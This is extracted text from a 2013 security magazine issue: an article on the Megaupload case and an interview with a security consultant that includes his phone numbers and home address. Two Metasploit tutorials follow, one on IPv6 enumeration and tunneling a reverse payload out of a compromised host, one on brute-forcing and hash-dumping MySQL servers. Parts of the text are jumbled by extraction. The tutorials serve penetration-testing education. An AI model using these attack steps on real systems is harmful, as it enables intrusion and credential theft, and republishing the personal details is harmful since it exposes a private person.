United States was shutting down the Megaupload. com business website could be a foreshadowing of how certain countries will treat others accused of software piracy and copyright infringement in the future. This trend could possibly occur, with or without the passage of SOPA, PIPA, and/or federal legislation to protect the rights of intellectual property owners on the Internet. Indeed, this high profile case of the demise of Mr. Dotcom, his colleagues and their Megaupload.com business shows the lengths to which the U.S. Government may be willing to go to shut down websites that promote software piracy, including producing detailed criminal indictments and incarcerating people, even if they are in foreign countries. Such actions may occur with or without the benefit of legislation such as SOPA or PIPA. Such actions are also very likely to have a chilling effect on rampant software piracy by international perpetrators which had not been taken very seriously until these events (RT.com, 2012). Some legal experts have predicted that it is likely that Mr. Dotcom and his colleagues will likely try to use the concept of “hactivism” as a defense against the charges for which they are indicted (Bright 2012). The idea behind “hactivism” is that it could be construed to be an act protected by the First Amendment because they may try to say they were exercising their rights of Free Speech as guaranteed by the First Amendment to the U.S. Constitution. Of course, the U.S. Government could easily argue that the First Amendment applies only to U.S. citizens and those living in the U.S., which would easily defect the hactivism as protected Free Speech argument. On February 16, 2012, the U.S. Department of Justice returned a superseding indictment against Kim Dotcom and his colleagues. The updated indictment was the result of additional investigation by the Department of Justice and it contained even more charges than the first indictment. The superseding indictment also shed additional light on how Megaupload.com was actually being used. The document provides additional details stating that Megaupload.com, which originally had claimed to have had more than 180 million registered users, actually had only 66.6 million users as of Jan. 19, 2012. Furthermore, the investigation also revealed that only 5.86 million of these users had ever uploaded a file to either Megaupload.com or Megavideo.com, prosecutors said (Halzack, 2012). On February 22, 2012, the New Zealand justice system finally permitted Kim Dotcom and his colleagues to post bail and gain provisional freedom
30
while they wait to determine of the U.S. Government will have them extradited to the U.S. to stand trial for the charges listed in the superseding indictment that was filed on February 16, 2012 (Tsukayama, 2012).
Conclusion
The strange, unfolding case of Mr. Dotcom and Megaupload.com, and all the circumstances surrounding the related actions of the governments of New Zealand and the United States are certainly worthy of examination as a case study in a Cyberethics course. In addition, as more facts and events with multiple dimensions in ethics and law are revealed in this case, the outcome will likely shed additional light on some timely legal issues related to Internet-based software piracy, the theft of intellectual property, and how lawful governments will treat others who commit similar offenses in the future. Will the United States and other governments reach beyond their borders again to incarcerate and criminally try trial those they believe are guilty of Internet-related crimes such as software piracy and copyright violations? Only time will tell, but the implications of the U.S. Government’s case against Mr. Dotcom and his colleagues will likely have far-reaching effects in the area of intellectual property, copyrights, software piracy, and the national and international laws related to these topics for many years to come.
William F. Slater, III
William F. Slater, III is an IT Security consultant who lives and works in Chicago, IL, United States of America. He has worked in Information Technology since 1977. In March 2013, he will complete his third graduate degree, an M.S. in Cybersecurity.
02/2013
11th & 12 th April 2013, PrAgue Does you organization implement Cyber Security Solutions? Would you like to learn from industry peers on how they do this? Do you have a solution that you would like to present in front of the biggest industry minds? The CSS will bring together key corporate security decision makers to discuss the strategic priorities, potential risk factors and threats. Together, they will provide you with inspirational guidance on how industry experts respond to these denunciatory challenges.
Special Offer in cooperation with:
20% off! (Discount code: HknIT)
Why should you attend?
What distinguishes this event?
n Gain an insight into the IT incidents n Understandt how nations premier companies are improving their cyber security n Address your questions to the best experts n Find out how secure you are and what level and form of attack could come in to you n Review your level of security and readiness for penetration n Align your security strategy with critical business and corporate goals n Obtain the latest update on state of art in digital treats in cyber underground n Utilize the full potential of cyber security n Learn how to information awareness can minimize your risk n HOT TOPIC: Banking Malware and Threats
CSS is not a typical summit focused on government agencies. The light is shed on coping with cyber risk in the enterprise world. Building on the success of our previous events, the distinguishing features of this unique format are: n One of the best experts in the world answers your question and provide their in-depth know-how n Unique mix of 15 presentations, practical sessions, key studies n Exclusive senior-level attendance n Practical and up-to-date studies and solutions n Customized itineraries n EBCG ThinkTank sessions - who knows your business better than your peers
4 Ways to contact us:
Tel.: +421 2 3220 2200 Fax: +421 2 3220 2222 e-mail: event@ebcg.biz web: www.ebcg.biz
hakin9 OnDemand
An Interview with
William F. Slater, III M.S. in Cybersecurity Program Bellevue University, Bellevue, NE
Ewa Durnac: How was your article selected for publication by Hakin9?
William F. Slater, III: I was identified as a Cybersecurity professional who is also a writer back in October 2012. They contacted me via e-mail and asked me to start writing articles for Hakin9 magazine. I think that they found me either on LinkedIn. com or via a Google search. The January 2013 article was my fourth article with the magazine. The editors and publishers at Hackin9 magazine are also fun to work with and they seem to appreciate working with Cybersecurity professionals who can write and deliver articles that meet their quality standards as well as their publication submission deadlines.
ED: Was the article something that developed out of a class project?
WS: No. I was inspired to write it because I knew that applying the concepts described in the article would help make cyberspace a little safer. The article explains how using a well-designed security compliance framework can help an organization defend against the perils of cyberattacks and cyberwarfare. As far as I know, no one yet been bold or knowledgeable enough to take the time to write such an article for the general public. Note that I did not receive any academic credit or even any compensation for writing this article.
ED: What led to your interest in Bellevue Universityâ&#x20AC;&#x2122;s Cybersecurity program?
WS: I was accepted into the M.S. in Cybersecurity program at Bellevue University on Friday, Aug. 26, 2011. I chose this program for two reasons: 1) you
32
folks appear to really have your act together compared to everyone else; and 2) I hope to work at least another 20 years, and the Bellevue University M.S. in Cybersecurity program will equip me to accomplish some great things, including teaching and equipping the Cyberwarriors of Americaâ&#x20AC;&#x2122;s future. I have been making a living in Information Technology since I started my service in the United States Air Force in July 1977. I served as a Computer System staff officer (AFSC 5135B) at Strategic Air Command Headquarters supporting the command control systems that provided command control and communications capability to SAC forces globally for the leadership of SAC and also the National Command Authorities. If you are interested in what I did at HQ SAC, there are several interesting pictures here: http://billslater.com/myusaf. After becoming ill in 1980, I left active duty in October 1980 and travelled to Houston, TX to begin my civilian career in IT. My career has involved many roles and many technologies over the years. You can see a synopsis of my career here: http:// billslater.com/career and here: http://billslater.com/ interview.
ED: What has been your impression of the program thus far?
WS: It's been very educational and VERY intense. I am completing my 11th and 12th classes in this program and it basically means that whenever school is in session, I have had no weekend time off since August 2011. Between work, teaching, and my M.S. and Cybersecurity course work, I have stayed extremely busy. It has been worth it, but I don't think people outside the program re-
02/2013
An Interview with William F. Slater, III
alize how hard the Bellevue University Cybersecurity students work to complete the assignments and keep their grades up. It is definitely the biggest challenge that I have had in academia. But, considering the importance of what we are learning and the overall high quality of the courses and the faculty, I would say that considering the price tag of the program it's a real bargain. I also admire Professor Woerner and Dr. Patrick for creating and administering this program. In the modern history of this country, the topic understanding and protecting everything in cyberspace has never been more important than it is right now. The M.S. in Cybersecurity program at Bellevue University fills a special and critical niche in national security and in the private sector.
ED: Should I refer to you primarily as an IT consultant? WS: Yes. I am a Senior IT Consultant.
ED: Do you have a primary employer I should refer to?
WS: I am the owner and head Sr. IT Consultant at Slater Technologies, Inc., and that is my own company, a Type "S' corporation.
ED: Also, what is your role at the Illinois Institute of Technology?
WS: I have been an adjunct professor at the Illinois Institute of Technology (IIT) for nearly five years. I teach the following classes at IIT: • Data Center Architecture • Data Center Management • Introduction to Operating Systems and Hardware, Level I • Introduction to Operating Systems Level II, with Linux, bash scripting and PERL Scripting • Introduction to Java Programming and OO Application Development Presently, I am teaching the following classes: • Data Center Management • Introduction to Operating Systems and Hardware, Level I • Introduction to Java Programming and OO Application Development
ED: How has your education at Bellevue influenced how you teach?
WS: I have paid a great deal of time and attention to focusing on the Cybersecurity aspects of
www.hakin9.org/en
EVERYTHING I teach. Since most of my students are rather young and about to begin their careers, I have influenced them toward jobs and education in Cybersecurity. They are also impressed that a guy with well over three decades of IT experience, would go make and work toward earning his third graduate degree, this time in Cybersecurity at Bellevue University online. My students are just beginning to wake up and realize that to work and thrive in the IT fields, it will mean a strong commitment toward a life-long education process. You can see a picture of me with my students at this link: http://on.fb.me/vfGRVi.
ED: How has your education impacted your work?
WS: My M.S. in Cybersecurity academic work and my career work have been extremely complementary to one another. My academic work, especially the research and writing have helped me refine and maximize my professional strengths, making be a stronger, more confident Cybersecurity professional who can consistently add more value to his clients. Also, I have been able to use real-world examples to be a more effective Cybersecurity graduate student. Doing the challenging and rigorous academic work that compliments my work experience and certifications has made me a more effective IT security professional. I believe also that it has made me more marketable in the workforce because this M.S. in Cybersecurity degree is still a rather new, rare, and elite thing. In 2013, I think that less than 200 people in the world have such a graduate degree.
ED: What are your plans following the completion of your Master’s degree?
WS: I plan to continue to do work in Cybersecurity, and to research, write, and teach. I think there are some things I can still create and write that will make cyberspace safer for all of us. I also plan to co-write with some of my students and also with other Cybersecurity professionals. In fact, I expect to be co-authoring one or two articles and presentations with Professor Woerner between now and the time I go through the June 2013 Bellevue Commencement Ceremony.
ED: Definitely feel free to add any additional comments that you would like.
WS: Behold, the Cyberwarrior I was, and still am: • 1977 • 2013
33
hakin9 OnDemand
William F. Slater, III 1977
2013
• Pursuit of additional education and training that will lead to additional certifications in Cybersecurity and Information Technology You can read some of my other writings and collections of resources at these links: • http://billslater.com/writing • http://billslater.com/iso27001
Currently, I am a freelance Sr. IT Consultant and IT Project Manager. At this moment, I am actively engaged in working on and managing an exciting Fast-Track ISO 27001 Implementation Project. You can see other information about my career and things like certifications at this link: http://billslater.com/interview. I have been interested in IT security since my days in the USAF and actually wrote a graduate paper on the legal issues related to unauthorized computer access and S.B. 215 for a University of Nebraska at Lincoln Business Law class back in Fall 1979. Presently, my interests include the following: Data Centers (Architecture and Operations) Cyberwarfare and Cyberdeterrence Making Cyberspace safer for everyone Compliance Cloud Computing Programming (PERL, Java, C#, Python, Visual Basic, and C++) • Security Automation using SCAP – the Security Content Automation Protocol • Service Management • Automation of mundane processes in IT to achieve increasingly greater efficiencies
• • • • • •
I am the most certified IT professional in the entire Midwest, if not the entire U.S. But I did not ask for, expect or receive any special treatment, and I did not ask to be credited for any of the security-related certifications that I have (CISSP, CISA, SSCP, etc.). I did all the coursework in this program the same as other students. You can view my M.S. in Cybersecurity program portfolio at this link: http://billslater.com/ms_cybersecurity. Thanks to Professor Woerner and Bellevue University for putting together this excellent Cybersecurity graduate program. I am greatly inspired by Professor Woerner and your contributions to the this hugely important field of Cybersecurity.
ED: It would be helpful if you could send along a headshot and/or a shot of yourself at work or something along those lines. WS: Any pictures from these links would be fine:
• http://sdrv.ms/UXWilC general and portrait pictures • http://on.fb.me/vfGRVi pictures of me with my students
William Favre Slater, III
MBA, M.S., PMP, CISSP, SSCP, CISA, ISO 27002, ISO 20000, ITIL v3, IP v6, Cloud Computing Foundation Project Manager / Program Manager slater@billslater.com williamslater@ gmail.com http://billslater.com/career 773 – 235 – 3080 – Home Office 312 – 758 – 0307 – Mobile 312 – 275 – 5757 – FAX 1337 N. Ashland Ave. No. 2 Chicago, IL 60622 United States of America
Ewa Durnac
34
02/2013
Hakin9 Exploitng Software
How to Explore the IPv6 Attack Surface with Metasploit? IPv6 is often described as a parallel universe, co-existing alongside existing IPv4 infrastructure in a bid to ease the transition process. Often left unmanaged and unmonitored in networks, those IPv6 packets could provide a great opportunity for the savvy attacker. Thanks to the Metasploit framework, exploring the IPv6 attack surface has become a lot easier.
E
arlier this year, the creators of the Metasploit Framework introduced support for IPv6. Adding tools to allow attackers and defenders to explore this brave new world, and the increased attack surface it can offer. In this article we will introduce Metasploit’s three IPv6 enumeration modules, how to use them, and what they are doing “under the hood”. We’ll also cover the core IPv6 concepts that allow these modules to function as they do. Finally, we’ll take a look a configuring an IPv6 tunnel from a compromised host, to allow the use of a reverse connection IPv6 payload over the IPv6 Internet. I find few commands as satisfying to execute as “msfupdate”. To many this may sound like a strange statement, but there are plenty of people who will completely understand where I’m coming from. Every time I enter “msfupdate”, I sit back in my chair and watch as my copy of the Metasploit Framework connects to the Metasploit servers and downloads the latest modules. I run that command at least daily, and every time I do, it always grabs me something new to dissect and work into my penetration-testing toolbox. I’m often surprised by the frequency and volume of some of the updates, but really I shouldn’t be. After all, the whole purpose of the Metasploit project is to provide a modular framework that allows exploits to be written in a standardized fashion to encourage community collaboration. Still, it’s refreshing to see that even after the project transitioned from a “pure” open source project to commercially owned and operated one (Metasploit was acquired by Rapid 7 in 2009), the community is still contributing, and those contributions are still released un-
36
der the original open-source license. According to Rapid 7, this will never change. Earlier this year “msfupdate” fetched some updates that made me lean forward faster and look a little closer than perhaps I normally would. Metasploit downloaded a selection of modules with “IPv6” in the description. IPv6 has been creeping into our lives over the past several years. Our operating systems, network equipment and phones have been gradually adding support for the new version of the protocol that will keep future networks and the internet run-
Figure 1. Typical output from “msfupdate” containing new additions and updates to existing
02/2013
How to Explore the IPv6 Attack Surface with Metasploit
ning, when the current version of the internet protocol (IPv4) is finally retired due to address space exhaustion. As you might expect, IPv6 offers some advantages over its predecessor. Primarily, the vast address space will ensure that theoretically every grain of sand on the planet could own an Internet connected device and not have to worry about hiding behind a NAT’ed IP. Additionally, IPv6 supports stateless auto-configuration – meaning that network administrators will no longer have to set up and manage DHCP servers, as IPv6 can “figure itself out” via the use of such mechanisms as neighbor discovery protocol messages sent via ICMP version 6. This is by no means an extensive list of differences, but I’d like to pause and consider the second “advantage” of IPv6 I’ve just mentioned from a security perspective. It’s this feature of IPv6 that the first batch of Metasploit IPv6 modules take advantage of. One thing should be made very clear before we go any further. IPv6 is not any more or less secure than IPv4. They both do different things in different ways, and understanding the differences is key for network administrators to successfully implement the new protocol in a secure fashion. The biggest insecurity in IPv6 at the moment is that there are very few IPv6-only networks out there. 99% of the time you’ll find spots of IPv6 traffic wandering across the same wires as its older sibling, quietly going about its business. Similarly, 99% of the time you can ask a network administrator what they think that traffic is up to and they’ll
reply with something along the lines of “erm, well that’s just noise, we don’t use IPv6 yet”. They likely aren’t doing anything with v6 just yet, but that doesn’t mean the devices sitting on the network aren’t. Out of the box, IPv6 is designed to “go find the quickest way to the Internet”. When you think of it like that, perhaps it’s time for network admins to “get all up” in IPv6’s business and see what it’s up to. After all, if devices are using it to communicate freely, then so can we. Currently Metasploit features a handful of scanner modules for IPv6 discovery, and IPv6 enabled versions of its traditional payloads. A quick and easy way to locate the IPv6 modules is to run the command “search ipv6” from within the Metasploit Console (Figure 2). Let’s take a moment to dissect the scanner modules, and what we can learn from them. First up is “ipv6_multicast_ping”, written by wuntee. This module sends a number of ICMPv6 packets to the various IPv6 addresses that are defined as multicast addresses, to which all IPv6 enabled hosts should respond. Then it listens for the ICMPv6 echo-reply responses and records both the IPv6 address and the hardware (MAC) address of the responding host. Very quickly we can learn which hosts on our local network are IPv6 enabled. When configuring the module we have the option of specifying the source IPv6 address and source MAC. The only mandatory option is a timeout, which is set at 5 seconds by default (Figure 3). Let’s take a closer look at the IPv6 multicast addresses we ping with this module. IPv6 addresses have a “scope” in which they are considered valid
Figure 2. Currently Metasploit offers three auxiliary scanner modules for IPv6 discovery and multiple payloads that run over IPv6
www.hakin9.org/en
37
Hakin9 Exploitng Software
and unique. This could be an address in the global scope, the site scope, link-local or interface local scope. Each scope features a well-known multicast address, which certain types of host are expected to join. The module has a sequential list of those addresses that it works its way through. We can pull those addresses from the Ruby code for the module. • FF01::1 – All nodes on the interface-local scope. • FF01::2 – All routers in the interface-local scope. • FF02::1 – All nodes in the link-local scope. • FF02::2 – All routers on the link-local scope. • FF02::5 – All OSPFv3 link state routers. • FF02::6 – All OSPFv3 designated routers. • FF02::9 – All RIP routers. • FF02::a – All EIGRP routers. • FF02::d – All Protocol Independent Multicast routers. • FF02::16 – Multicast Lister Discovery reports. • FF02::1:2 – All DHCP servers in the link-local scope. • FF05::1:3 – All DHCP servers in the site-local scope. To better understand the idea of IPv6 scopes we can compare them to their IPv4 equivalents. The global scope is best compared to any public IP address range in IPv4. A global IPv6 address can uniquely identify a host on the Internet. Site-local should be considered equivalent to RFC1918 private IP addressing and is used within a specific site, such as an office. Interface-local is similar to an APIPA or 169.* IPv4 address, and is automatically generated to allow communication across a link without the need for any other routing information. One difference between link-local addresses in IPv6 and IPv4 is that there always needs to be one
Figure 3. Quickly locating nearby IPv6 enabled hosts with ipv6_multicast_ping
38
assigned to every IPv6 enabled interface – even when it has other addresses. That means that as long as there is IPv6 on the network, there will be link-local addresses in the link-local multicast scope. You can spot a link-local address because it will have the prefix “fe80”. As you might expect, these addresses cannot be routed over the Internet. So while they can be used to communicate with a machine in the same layer 2 broadcast domains as the host you are working from, if you want to be able to have fun across the IPv6 Internet, a global address is required. We’ll talk about obtaining one of those later. Our next Metasploit module is “ipv6_neighbor”, created by belch <>. This enumeration module takes advantage of Neighbor Discovery Protocol (NDP). NDP uses a subset of ICMPv6 packets used by IPv6 to perform various auto-configuration and link state monitoring tasks to find the link-local addresses of IPv6 hosts within the same segment. As an aside, one such NDP task is determining if it’s intended link-local address is already in use. This process, imaginatively called duplicate address detection (DAD), is actually prone to denial of service. Tools exist, although not presently modulized in Metasploit, which will respond to all DAD requests with “address in use” messages. This will prevent any new IPv6 devices that join the network from configuring a link-local address, as every option it advertises will be reported as a duplicate. One such tool for this task is “dos-new-ip6” written by van Hauser. Back to the module in question. Its purpose is to take an IPv4 range and show you the relationship between the IPv4 and IPv6 addresses on the target network. This allows you to quickly identify which hosts are dual-stacked, that is, running both IPv4 and IPv6 side by side (Figure 4).
Figure 4. Mapping the relationship between IPv4 and IPv6 link-local addresses
02/2013
To do this it actually completes two tasks as part of its execution. The first is a blast from the past – we perform an ARP sweep of the given IPv4 range, to learn the MAC address of each IPv4 host. Secondly it will send an ICMPv6 neighbor solicitation packet, from which we’ll learn the MAC address of the IPv6 enabled host. Compare the two MAC addresses, if any match – we have our mapping. Seeing these two processes side-by-side is interesting as ICMPv6 neighbor discovery is IPv6’s ARP replacement, and we can compare the way they go about doing the same job. Unlike IPv4, IPv6 does not implement broadcast. The reason for this is efficiency. Traditional ARP uses broadcast to query all the hosts on the subnet to find the MAC address of an IPv4 host so it can make a layer 2 delivery. In other words, everyone gets bugged every time someone wants to locate a MAC address. In IPv6, the process relies on multicasting – which is means that fewer hosts get bugged and the address resolution process is much quicker. Neighbor solicitation packets are sent to a special kind of multicast address – known as a solicited-node multicast address. Each IPv6 interface will have such an address and its purpose is to provide the layer 2 (mac address) of the host. These addresses are generated using an simple algorithm, which will drop all but the last 24 bits of the hosts regular unicast address and append it with the prefix FF02::1:FF00:0/104. Using Wireshark to capture the ICMPv6 packets sent out by the Metasploit module we can see these addresses in action (Figure 5). Notice how in packets 231 and 232, we send a neighbor solicitation to the solicited-node multicast address ff02::1:ff8f:ddb3, and we get our response back in the form of a neighbor advertisement from the unicast link-local address of the host (fe80::7256:81ff:fe8f:ddb3). An ICMPv6 neighbor advertisement can either be sent in response to a solicitation, as we’ve just shown, or it can be sent unsolicited to an all-node multicast address to inform neighbors of a change in address or link state. The final scanner module currently in Metasploit is ipv6_neighbour_router_advertisement, which like ipv6_multicast_ping is also written by wuntee. ICMPv6 router advertisements and solicitations are fairly similar to neighbor advertisements and solicitations, but as you can probably guess, are used to discover routers rather than “regular” hosts. Routers transmit advertisements on a regular basis via multicast, and also in response to router solicitations from hosts on the network.
www.hakin9.org/en
Hakin9 Exploitng Software
This module will aim to enumerate link-local IPv6 addresses by crafting and transmitting false router advertisements for a new network prefix via multicast. In turn this will trigger any hosts in that multicast scope to start the auto-configuration process, create a new global IPv6 address on its interface and send a neighbor advertisement for that address. The module will then manipulate the IPv6 address in the advertisement, dropping the newly acquired global prefix and replacing it with the standard link-local prefix. Finally, to confirm that the enumerated address is in fact alive it will send out a neighbor solicitation message. This works under the assumption that the operating system uses the same interface portion of the IPv6 address on all of its addresses (Figure 6). So let’s take a closer look at the module in action. We don’t need to provide any options other than a couple of timeout parameters, which by default are set at 5 and 1 seconds respectively. Once we run the module it will begin sending advertisements for the network prefix 2001:1234:dead:beef to the multicast address FF02::1, which as we know from earlier is “all nodes in the link-local scope”. Incidentally, this network prefix is hard coded into the module’s source (Figure 7). Upon receipt of the advertisement all hosts on the local scope will begin auto-configuration of a new IPv6 address within the new prefix (Figure 8). Of the three enumeration modules we’ve looked at, this is by far the nosiest and therefore the most
likely to be detected. We are actually taking the time to set an address on the remote host, and there is no guarantee that the interface portion of the new address will match the link-local address calculated by the module. Some systems implement randomization in the interface portion. Having said that, it’s always good to have different ways of achieving the same goal! So far we’ve concentrated on the auxiliary modules in the Metasploit framework and doing some basic IPv6 enumeration in the link-local scope. This is an important first step and assumes that you already have some sort of foothold into the network, but let’s say we now want to take things one-step further. We are going to try a break out onto the IPv6 Internet, and that means we’ll need a tunnel. The idea of tunneling out using IPv6 encapsulated in IPv4 packets is a very attractive proposition, as many controls, such as IPS/IDS and firewalls will not be configured to alert on or prevent such traffic leaving. So the scenario is as follows – we’ve compromised a Linux machine using Metasploit and we have a shell. The host has IPv6 support and a link-local address. Now we want to create a global IPv6 address on the box to allow it to communicate back to us over the IPv6 Internet for extra obscurity. You need two things to get an IPv6 tunnel to work – a tunnel broker, of which there are plenty, many
Figure 5. ICMPv6 NDP packets, sent initially to the solicited-node multicast addresses of each host
Figure 6. Using false router advertisements with “ipv6_ neighbor_router_advertisement” to obtain link-local addresses
40
Figure 7. Sending an ICMPv6 router advertisement message for the network prefix “2001:1234:dead:beef”, as captured by Wireshark
02/2013
How to Explore the IPv6 Attack Surface with Metasploit
of them are free of charge. Secondly, if the box you are working on is behind a NAT device, it must support the forwarding of protocol 41 – in other words, IPv6 encapsulated in IPv4. If we are behind a NAT device that doesn’t forward protocol 41, we are out of luck (Figure 9). For the purposes of this example I’ll be using a tunnel provided by Hurricane Electric (he.net). Once signed up, the tunnel broker provides both a client and server IPv6 address, and an IPv4 address of the tunnel broker server. These values will be as follows: HE.net HE.net Target Target Target
Tunnel Server IPv4 address – 72.52.104.74 Tunnel Server IPv6 address – 2001:DB8::20 Network Outside NAT IPv4 address – 1.1.1.1 Machine IPv4 Address – 192.168.0.115 Machine IPv6 Address – 2001:DB8::21
Note You may have noticed the outside IPv4 and IPv6 addresses used in this example will not work in real life. The IPv6 address prefix I’ve used is reserved for documentation, and is not routable over the Internet. When configuring the tunnel in the he.net site, you must provide the outside IPv4 address of the target.
It should also be noted, that he.net site requires that this address responds to ping (Figure 10). Back on our victim machine, we run a few commands to bring up the new tunnel interface and set up a route to ensure all IPv6 traffic goes via that new interface. “ip tunnel add ipv6inet mode sit remote 72.52.104.74 local 192.168.0.115 ttl 255” – This creates a SIT (simple internet transition) interface named ipv6inet and defines the local and remote IPv4 addresses for the tunnel endpoints, or in other words, the IP of the target machine and tunnel server. “ip link set ipv6inet up” – This brings the tunnel interface up. ip addr add 2001:db8::21 dev ipv6inet – This assigns the IPv6 address to the interface. ip route add ::/0 dev ipv6inet – This command will add a route to send all IPv6 traffic across the new tunnel interface (Figure 11). A quick way to confirm that the IPv6 Internet is now within our reach is to use the ping6 utility to hit an IPv6 website. In this case ipv6.google.com, which has the address 2607:f8b0:400e:c00::93. This tunnel can now be used by a Metasploit reverse connection payload to connect to an attack-
Figure 8. Two outputs of “ifconfig” on a Mac OS X machine on the same network as our Metasploit instance. The first output is pre-false advertisement, the second is just after. Notice the addition of a “dead:beef” IPv6 address, thanks to auto-configuration
Figure 10. Signing up for an IPv6 tunnel from Hurricane Electric (ipv6.he.net)
Figure 9. On the compromised Linux host “webapp1”, eth0 has an IPv4, and link-local IPv6 address
Figure 11. Creating an IPv6 tunnel interface on the target machine
www.hakin9.org/en
41
Hakin9 Exploitng Software
er with a global IPv6 address of their own, which of course can be obtained in exactly the same way as we’ve just shown. Let’s say in this example we want our payload to connect back to us at the address 2001:db8::99 (Figure 13). Configuring an IPv6 payload in Metasploit is essentially the same as an IPv4 payload, but there are a couple of minor differences. Obviously, you must specify an IPv6 address for your listener (or target if a binding payload), and also if using a linklocal address on a host with multiple interfaces, you should specify the scope ID. To summarize, let’s take one last look at the scenario we’ve just discussed (Figure 14).
Conclusion
For many out there, the mere sight of an IPv6 address is enough to put them off learning more about the protocol. This is the biggest vulnerability in IPv6, and like most security vulnerabilities, it’s a human problem. The protocol is being adopted in devices at a much quicker rate than people are willing to manage and configure it properly.
For attackers, this provides great opportunities to jump on the unmanaged jumble and use it to build something that can be used to move around networks in ways that the owners of those networks aren’t expecting. For defenders, this means developing a whole new security model with emphasis on securing the endpoints rather than the perimeter. After all, IPv6 doesn’t hide behind NAT like its predecessor. By introducing IPv6 payloads and modules the Metasploit framework has given both groups new tools to better understand and manipulate the IPv6 protocol. Of course, we are only just getting started. The nature of the Metasploit community is to constantly build, innovate and improve upon what is already in place. These initial modules will act as a catalyst for further development in IPv6 enumeration and exploitation. Remember that the next time you run “msfupdate”, and keep one eye open for new ways to use IPv6 for exploitation.
Figure 12. Sending ping packets to Google over the IPv6 Internet using our new tunnel interface
Figure 13. Setting up an IPv6 payload in Metasploit
Mike Sheward
Figure 14. An overview of our IPv6-over-IPv4 tunnel set up
42
Mike Sheward is a security specialist for a software-as-a-service provider based in Seattle. He began his career as a network engineer working in the British public sector. During this time he developed a passion for security and started on a path that led him to a full-time security role with a private organization. Mike has performed penetration testing for a wide range of public and private sector clients, has been involved in a number of digital forensics investigations and has delivered security training to fellow IT professionals.
02/2013
Hakin9 Exploitng Software
How to Use Sqlploit? Databases nowdays are everywhere, from the smallest desktop applications to the largest web sites such as Facebook. Critical business information are stored in database servers that are often poorly secured.
S
omeone an to this information could have control over a company’s or an organization’s infrastructure. He could even sell this information to a company’s competitors. Imagine the damage that something like this could cause. In this article, we will see how we can use Metasploit to attack our database servers. Metasploit is a very powerful tool. Actually, is not just a tool, it is a collection of tools. It is a whole framework. It has gained incredible popularity in the last few years because of its success in the fields of penetration testing and information security. It includes various tools, from various scanners to exploits. It can be used to discover software vulnerabilities and exploit them. With database servers having so many security weaknesses, Metasploit has numerous auxiliary modules and exploits to assist you with your database server penetration testing. Metasploit is available for all popular operating systems so what operating system you are already using might not be a problem. In this article we are going to use Metasploit’s auxiliary modules and exploits to complete various penetration testing tasks against popular database servers, such as Microsoft SQL Server and MySQL. I hope you enjoy it!
but as with any software that is publicly accessible, you can’t take anything for granted.
Discover open MySQL ports
MySQL is running by default on port 3306. To discover MySQL you can do it either with nmap or with Metasploit’s auxiliary modules. The NMAP way Nmap is a free and open source network discovery and security auditing utility. It can discover open ports, running services, operating system version and much more. To discover open MySQL ports we use it in this way: nmap -sT -sV -Pn -p 3306 192.168.200.133
Parameters: -sT: TCP connect scan -sV: Determine Service version information -Pn: Ignore Host discovery -p 3306: Scan port 3306
Attacking a MySQL Database Server
MySQL is the world’s most used open source relational database management system. Its source code is available under the terms of the GNU General Public License and other proprietary license agreements. MySQL is the first database choice when it comes to open source applications creation. MySQL is a very secure database system,
44
Figure 1. Discovering MySQL servers – The nmap way
02/2013
How to use Sqlploit
Scanning the whole network:
set RHOSTS 192.168.200.0/24
nmap -sT -sV -Pn -â&#x20AC;&#x201C;open -p 3306 192.168.200.0/24
Parameters:
Set the RPORT parameter to a different value if you believe that the MySQL Server is listening on a different port:
--open: Show only open ports (Figure 2)
Set RPORT 3333
The Metasploit way Metasploit offers auxiliary module mysql_version. This module enumerates the version of running MySQL servers. To use it type:
Increase THREADS value for a faster scanning (Figure 4):
use auxiliary/scanner/mysql/mysql_version
Now, all you have to type is:
To use this scanner you have to set its options. Type:
run
show options
and hit enter (Figure 5).
To see a list of available options (Figure 3). Set the RHOSTS parameter:
As you can see from the screenshot we have a MySQL version 5.0.51a running at 192.168.200.133!
set RHOSTS 192.168.200.133
Brute forcing MySQL
or
set THREADS 50
There is an auxiliary module in Metasploit called mysql_login which will happily query a mysql server for specific usernames and passwords. The options for this module are: Figure 6. To start your attack you have to set the RHOSTS option and choose a username and a password. SET RHOSTS 192.168.200.133 SET USERNAME root
Figure 2. Discovering MySQL servers â&#x20AC;&#x201C; The nmap way
Figure 5. mysql_version scanner in action Figure 3. mysql_version auxiliary module options
Figure 4. mysql_version options after setting them up
www.hakin9.org/en
Figure 6. mysql_login module options
45
Hakin9 Exploitng Software
Leave the password blank. Your options, after executing the commands above, should seem like Figure 6. mysql _ login will try to login with blank password and with the username as the password. Maybe we are lucky before we start bruteforcing database with passwords lists (Figure 7). We were lucky! The administrator is completely ignorant. But what if we werenâ&#x20AC;&#x2122;t so lucky? We then need a password list file. We can create one by ourselves or download one from the Internet. Letâ&#x20AC;&#x2122;s create one!
The above command will create passwords between 6 and 8 characters long, consisting of ascii characters a,b,c,d,e and numbers 1,2,3,4,5,6 and will save the list into file passfile.lst (Figure 8).
Creating a password list To create our password list we are going to use crunch. If you are using BackTrack, crunch is already installed. Open Privilege Escalation > Password Attacks > Offline Attacks > crunch. Otherwise download it from here http://sourceforge.net/projects/crunch-wordlist/. Execute:
Increase also the number of concurrent threads for a faster brute-force attack.
./crunch 6 8 abcde123456 -o passfile.lst
Using password lists Now that we have our password list stored in / pentest/passwords/crunch/passfile.lst, we can use it in mysql_login module. Set PASS_FILE /pentest/passwords/crunch/passfile.lst
SET THREADS 50 run mysql _ login (Figure 9) module offers 2 other options, USER _ FILE and USERPASS _ FILE. You can use a username file list to try various username values by setting the USER _ FILE option accordingly. With USERPASS _ FILE parameter you can use a file which contains both usernames and passwords in the same file separated by space and one pair per line.
Bypass MySQL Authentication
Module mysql_authbypass_hashdump exploits a password bypass vulnerability in MySQL and can extract usernames and encrypted passwords hashes from a MySQL server. To select it type: Figure 7. Starting brute-forcing database with passwords lists
use auxiliary/scanner/mysql/mysql_hashdump
Set RHOSTS and THREADS option:
46
Figure 8. Generating a password list with crunch
Figure 10. Running mysql_authbypass_hashdump module
Figure 9. mysql brute-force attack using password list
Figure 11. mysql server hashes and usernames
02/2013
How to use Sqlploit
and run the module. We can also set parameter username.
This module offers options such as setting a custom path for john the ripper. The option that interests you the most is the Wordlist option, which is a path to your desired password list (Figure 12).
set username root
Getting the schema
set RHOSTS 192.168.200.133 set THREADS 50
Unlucky! (Figure 10)
Dump MySQL Password Hashes
